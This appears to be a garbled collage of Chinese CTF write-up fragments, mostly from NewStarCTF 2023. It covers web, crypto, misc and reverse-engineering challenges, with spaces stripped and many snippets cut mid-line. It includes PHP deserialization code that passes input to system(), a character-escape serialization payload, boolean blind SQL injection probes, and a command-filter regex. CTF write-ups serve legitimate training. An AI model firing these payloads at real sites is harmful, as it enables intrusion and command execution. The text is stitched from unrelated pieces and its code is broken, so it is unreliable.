WEEK4|WEB逃源码：key = $key;    }    public function __destruct()    {        system($this->cmd);    }}unserialize(waf(serialize(new GetFlag($_GET['key'])))); www-datawww-data经典的反序列化漏洞字符逃逸增多问题bad替换为good 字符增加一位首先序列化代码很容易构造如下得到O:7:"GetFlag":2:{s:3:"key";N;s:3:"cmd";s:4:"ls/";}我们需要逃逸的就是s:3:"cmd";s:4:"ls/";

官方WPhttps://shimo.im/docs/XKq421EBKzFyRzAN/readNewStarCTF2023Week1官方WriteUp.htmlMiscCyberChef’sSecret下载附件后，是一个压缩包，解压后获得flag.txt打开txt发现是base加密来签到吧！下面这个就是flag，不过它看起来好像怪怪的:-)M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=CyberChef赛博厨子使用Magic一把梭了base32——>base58——>base64，

文章目录前言Week1MiscCyberChef'sSecret机密图片流量！鲨鱼！压缩包们空白格隐秘的眼睛Web泄露的秘密BeginofUploadErrorFlaskBeginofHTTPBeginofPHPR!C!E!EasyLoginCryptobrainfuckCaesar'sSecertfenceVigenèrebabyrsaSmalldbabyxorbabyencodingAffinebabyaesWeek2Crypto滴啤不止一个pihalfcandcodeRotateXorbroadcastpartialdecryptWeek3CryptoRabin'sRSA小明的密码题kn

一、Rabin'sRSA题目信息fromCrypto.Util.numberimport*fromsecretimportflagp=getPrime(64)q=getPrime(64)assertp%4==3assertq%4==3n=p*qe=2m=bytes_to_long(flag)c=pow(m,e,n)print('n=',n)print('c=',c)#n=201354090531918389422241515534761536573#c=20442989381348880630046435751193745753典型的Rabin加密算法脚本importgmpy2importli

RSAVariationII1、题目信息提示："SchmidtSamoa"附件信息fromsecretimportflagfromCrypto.Util.numberimport*p=getPrime(1024)q=getPrime(1024)N=p*p*qd=inverse(N,(p-1)*(q-1)//GCD(p-1,q-1))m=bytes_to_long(flag)c=pow(m,N,N)print('c=',c)print('N=',N)print('d=',d)#c=1653396627113549535760516503668455111392369905404419847336

WEEK3|WEB(5/6)medium_sqlSqlmap一把梭（部分能直接flag'部分出现flag不完整或者部分爆不到表等官方wp）在week1的基础上，多过滤了union。验证存在布尔盲注：?id=TMP0919'Andif(1>0,1,0)#?id=TMP0919'Andif(0>1,1,0)#发第一个，有回显，第二个，没回显，说明页面可以根据if判断的结果回显两种（真假）内容，因此是布尔盲注。盲注脚本，用二分查找。（不会二分查找也没事，可以尝试自己写，反正初学别用sqlmap）importrequestsdefcondition(res):if'Physics'inres.text

文章目录week1HTTPHead?Header!我真的会谢NotPHP函数绕过Word-For-You万能密码week2Word-For-You(2Gen)报错注入IncludeOne文件包含+伪随机数UnserializeOne反序列化ezAPIgraphQLweek3BabySSTI_OnemultiSQL堆叠注入IncludeTwopearcmd.php的利用MaybeYouHaveTothinkMoreweek4SoBabyRCEBabySSTI_TwoUnserializeThreephar反序列化又一个SQLweek5GivemeyourphotoPLZ图片马UnsafeApac

一、brainfuck附件信息++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++>>>>>>++++++.>----.-

Unserialize？highlight_file(__FILE__);// Maybe you need learn some knowledge about deserialize?class evil {    private $cmd;    public function __destruct()    {        if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){            @system($this->cmd);        }    }}审计代码：反序列化自动触发__destruct()魔术方

目录Hello_ReverseBaby_RePyreEasyRe艾克体悟题Hello_Reverse打开ida,shift+f12查看字符串就可以看到flag: 这段数据很可疑：c=[118,101,114,115,49,110,103,95,119,48,114,108,100,125]foriinc:print(chr(i),end='')#vers1ng_w0rld} 合起来就是：.flag{h3llo_rvers1ng_w0rld}Baby_Reexp:c=[0x66,0x6D,0x63,0x64,0x7F,0x56,0x69,0x6A,0x6D,0x7D,0x62,0x62,0x62